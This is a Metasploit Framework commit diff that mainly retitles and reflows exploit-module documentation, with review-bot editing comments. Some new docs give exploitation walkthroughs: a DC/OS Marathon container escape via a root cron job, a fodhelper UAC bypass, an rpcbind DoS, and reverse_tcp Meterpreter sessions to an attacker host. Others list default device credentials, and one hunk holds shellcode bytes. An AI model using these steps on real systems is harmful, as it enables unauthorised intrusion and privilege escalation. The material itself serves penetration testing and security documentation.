mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00

Update branch to include changes from upstream/master

OJ 2017-06-09 17:18:57 +10:00
commit c4288fb35a
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
80 changed files with 1224 additions and 306 deletions

View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
Other examples of setting the RHSOTS option:
Other examples of setting the RHOSTS option:
Example 1:

View File

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output
## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
### 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > auxiliary/admin/chromecast/chromecast_youtube

View File

@ -27,7 +27,7 @@
7. You should get credentials
## Sample Output
## Scenarios
```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'

View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```
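Review bot: the Scenarios transcript gives the reader no way to tell whether the DoS worked; the run ends with only "Scanned 1 of 1 hosts" and "Auxiliary module execution completed", with no [+]/[-] status line, so success looks identical to failure. Since the Verification Steps end with "Target should leak memory", the doc should say how to confirm that on the target (for example, comparing rpcbind's resident memory before and after the run). Minor: the Verification Steps number every item "1." while the other docs touched in this commit use 1..n.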

View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7`
6: Do: `run`
## Sample Output
## Scenarios
#### Certificates Search
### Certificates Search
```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7

View File

@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
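Review bot: the context step "3. Do: ```set RPORT [IP]```" uses the wrong placeholder; RPORT takes a port, so it should read `set RPORT [PORT]` as in the other docs in this commit. The same step appears in the ftp_login and ftp_version docs touched here, so fix all three while the files are open.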

View File

@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org

View File

@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version

View File

@ -1,4 +1,13 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts:
1. root/root
2. admin/1
3. alg/1
4. user/1
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_webserver
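Review bot: the new heading "### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)" is a sentence, not a scenario title, and will look odd in a table of contents. The chromecast_youtube doc in this commit uses "### 1st generation Google Chromecast (USB stick looking, not circular)"; reuse that form here, e.g. "### 1st generation Google Chromecast (three devices, USB stick looking, not circular)". The chromecast_wifi doc in this commit has the identical heading and should get the same change.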

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_wifi

View File

@ -34,9 +34,10 @@ You can use any web application to test the crawler.
4. Do: ```set URI [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
```
msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1
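Review bot: the context steps "4. Do: ```set URI [PATH]```" and "4. Do: ```run```" are both numbered 4; renumber the second to 5 while touching this section. Also `msf> use` in the transcript lacks the space the other transcripts use (`msf > use`).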

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to execute arbitrary system commands:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_cmd_exec

View File

@ -1,4 +1,5 @@
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
## Verification Steps
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_config

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to dump system hashes:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_hashes

View File

@ -1,4 +1,5 @@
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
## Verification Steps
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_web_login

View File

@ -1,11 +1,13 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17.
* VMU-C EM prior to firmware Version A11_U05
* VMU-C PV prior to firmware Version A17.
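Review bot: the split sentence still carries the original grammar error: "enumerates device firmware version, and attempt to extract the SMTP configuration" should read "attempts to extract". In the next line, "A valid, admin privileged user" reads better hyphenated as "admin-privileged user". In the new bullet list, only the second item ends with a period; make the two consistent.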
## Verification Steps
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot

View File

@ -1,4 +1,5 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
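Review bot: the re-wrapped lines keep a few wording slips worth fixing in the same change: "affected with an authentication bypass vulnerability" should be "affected by"; "remotely extract Administrator password" needs the article ("extract the Administrator password"); and "password can not be extracted" should be "cannot be extracted".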
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin

View File

@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125

View File

@ -1,4 +1,5 @@
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
It is typically faster than the traditional form-based OWA login method.
## Verification Steps
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
3. Set TARGETURI if necessary.
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(owa_ews_login) > run

View File

@ -25,7 +25,8 @@ is extremely common.
You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/`
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238

View File

@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(cisco_ike_benigncertain) > show options

View File

@ -1,6 +1,8 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
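Review bot: the context line "Backup url can also be retrieved by quering the OID" has a typo ("querying"), and "url" should be "URL" throughout this paragraph. "Cambium ePMP current version (3.2.x, as of today)" will age badly in a doc; state the version that was actually tested and drop "as of today".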
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot

View File

@ -0,0 +1,192 @@
# Vulnerable Application
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS
## DCOS
This Exploit was tested with CentOS 7 as the host operating system for
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
Default 'custom' installation for on site premise setup. Only the Install
part of the DCOS guide was completed, the system hardening and securing
your cluster section where skipped. This is to represent a 'Default' install
with a system admin conducting hasty deployments taking no thought about security.
## To Setup Your Cluster
I recommend doing a 'on-premise'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
sudo groupadd nogroup && sudo reboot
```
Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
--add-repo \
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot
```
Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastly generate ssh rsa keys for authentication. And update the
/etc/ssh/sshd_config file to support root login.
```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```
Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
Login and get their current IP address.
* Note: I recommend giving them static IPs if you have further use for the cluster.
From here use another Linux machine with docker installed to finish
the installation process. I used an Ubuntu machine with docker installed.
Follow the custom CLI guide for creating the required files in
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/
Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`
Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://[master_ip]:8080/
You should see the Marathon UI web application.
# Exploitation
This module is designed for the attacker to leverage, creation of a
docker container with out authentication through the DCOS Marathon UI
to gain root access to the hosting server of the docker container
in the DCOS cluster.
## Options
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```
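Review bot: in the Docker install block, `sudo echo overlay > /etc/modules-load.d/overlay.conf` does not do what the guide intends: only `echo` runs under sudo, the redirection is performed by the unprivileged shell, so the write to /etc/modules-load.d fails with permission denied. Use `echo overlay | sudo tee /etc/modules-load.d/overlay.conf` instead. The ip-detect script also hardcodes the interface name `ens33`, which is specific to the VM used here; say so, or detect the interface, since a wrong name makes `ip addr show` fail under `set -o errexit`. Wording fixes for the same hunk: "executes command as uid 0" (commands), "files owed by root" (owned), "abuses this to creates a cron job" (to create), "Further more" (Furthermore), "where skipped" (were skipped), "install requirements base on the above guide" (based on), "get a cup of coffie" (coffee), and the `*Notes:` italic marker is never closed. Structurally, "# Vulnerable Application" and "# Exploitation" use a single `#` while the other module docs in this commit use `##`, "## Example Output" should be "## Scenarios" to match the heading the rest of this commit standardises on, and the task-list checkboxes under "## Steps to exploit with module" differ from the numbered "Do:" steps used everywhere else.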

View File

@ -17,7 +17,7 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability,
3. Do: ```set URIPATH / [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
### IE 11 and Flash 18.0.0.194

View File

@ -17,7 +17,7 @@ The Apache Axis2 Web application has three main sections:'Services' lists all th
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/multi/http/axis2_deployer
@ -57,6 +57,4 @@ Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.10.155.37 - Meterpreter session 3 closed. Reason: User exit
```

View File

@ -34,7 +34,7 @@ If you are on a different platform (such as Windows), the installation should be
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/multi/http/glassfish_deployer

View File

@ -1,6 +1,7 @@
## Vulnerable Application
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3.
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x.
A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3.
## Vulnerable Setup
@ -47,7 +48,7 @@ To set up the vulnerable environment, please do:
In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here.
## Sample Output
## Scenarios
### The Check command

View File

@ -1,6 +1,7 @@
## Description
This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.
This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x.
This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.
## Verification Steps
@ -13,8 +14,6 @@ cd taco
vim config/environments/development.rb
```
Add the following line just before the final `end` tag:
```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```
@ -38,7 +37,7 @@ sudo apt-get install nodejs
3. Do: ```set RPORT [Port]```
4. Do: ```run```
## Sample Output
## Scenarios
### Rails version 4.2.6

View File

@ -1,6 +1,7 @@
## Description
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 9, build 90109 and build 91084.
This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
This exploit was successfully tested on version 9, build 90109 and build 91084.
**NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
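Review bot: the description names the class twice in one sentence: "the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class". Drop the trailing "in the FileUploadServlet class". The NOTE about `rdslog0.txt` is useful; consider moving it into the Scenarios section so that readers see it next to the run output.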
@ -21,7 +22,7 @@ Desktop Central is integrated desktop and mobile device management software that
3. Do: ```check```
4. Do: ```run```
## Sample Output
## Scenarios
```
$ msfconsole

View File

@ -30,7 +30,7 @@
4. Do: `run`
5. You should get a session
## Sample Output
## Scenarios
```
msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec

View File

@ -21,7 +21,7 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte
3. Do: ```set PATH / [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use exploit/windows/iis/iis_webdav_upload_asp

View File

@ -0,0 +1,91 @@
## Intro
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
## Usage
You'll first need to obtain a session on the target system.
Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
and manually create a job handler corresponding to the payload.
##Scenario
```
msf >
[*] Sending stage (1189423 bytes) to 192.168.50.4
[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100
msf > sessions -i 11
[*] Starting interaction with 11...
meterpreter > shell
Process 9496 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\Users\sasha\Desktop>exit
exit
meterpreter >
Background session 11? [y/N]
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set SESSION 11
SESSION => 11
msf exploit(bypassuac_fodhelper) > show targets
Exploit targets:
Id Name
-- ----
0 Windows x86
1 Windows x64
msf exploit(bypassuac_fodhelper) > set target 0
target => 0
msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on 192.168.50.1:4445
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 192.168.50.4
[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100
[*] Cleaining up registry keys ...
meterpreter > shell
Process 4076 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
ERROR: Unable to get user claims information.
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\WINDOWS\system32>
```
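Review bot: `##Scenario` is missing the space after `##`, so CommonMark renderers will not treat it as a heading; it should be `## Scenarios`, the heading this commit standardises on elsewhere. Wording in the Usage section: "The module use an hardcoded timeout" should be "uses a hardcoded timeout", and "On slower system" should be "On slower systems". "## Intro" is also unlike the "## Vulnerable Application"/"## Description" headings used by the other docs here. The transcript line "[*] Cleaining up registry keys ..." is the module's own output, so that typo belongs in the module source rather than the doc. The before/after `whoami /all | findstr "Mandatory Label"` output (S-1-16-8192 Medium to S-1-16-12288 High) is a good way to show the effect; keep it.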

View File

@ -27,6 +27,8 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
## Scenarios
### Version of software and OS as applicable
Specific demo of using the module that might be useful in a real world scenario.
```

View File

@ -40,6 +40,9 @@ delta:
call go_all_native ; perform the transition into native x64 and return here when done.
mov ax, ds ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
mov ss, ax ; found and fixed by ReWolf, incorporated by RaMMicHaeL
add esp, (8+4+8) ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
pop edi ; restore the clobbered registers
pop esi ;
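Review bot: the two added instructions (`mov ax, ds` / `mov ss, ax`) change the length of the stub, so the byte array generated from this source (migrate_executex64) and every hardcoded offset in it must be regenerated from the assembler rather than patched by hand; please state in the commit which assembler produced the new blob so the two stay reproducible. The comment on `mov ss, ax` should also say what the instruction is for (reloading SS with a valid 32-bit data selector after returning from native x64), not only where the fix came from.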

View File

@ -12,11 +12,14 @@
#endif
// see '/msf3/external/source/shellcode/x86/migrate/executex64.asm'
// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
// found and fixed by ReWolf, incorporated by RaMMicHaeL
BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00"
"\x58\x83\xC0\x25\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00"
"\x89\x02\xE8\x09\x00\x00\x00\x83\xC4\x14\x5F\x5E\x5D\xC2\x08\x00"
"\x8B\x3C\x24\xFF\x2A\x48\x31\xC0\x57\xFF\xD6\x5F\x50\xC7\x44\x24"
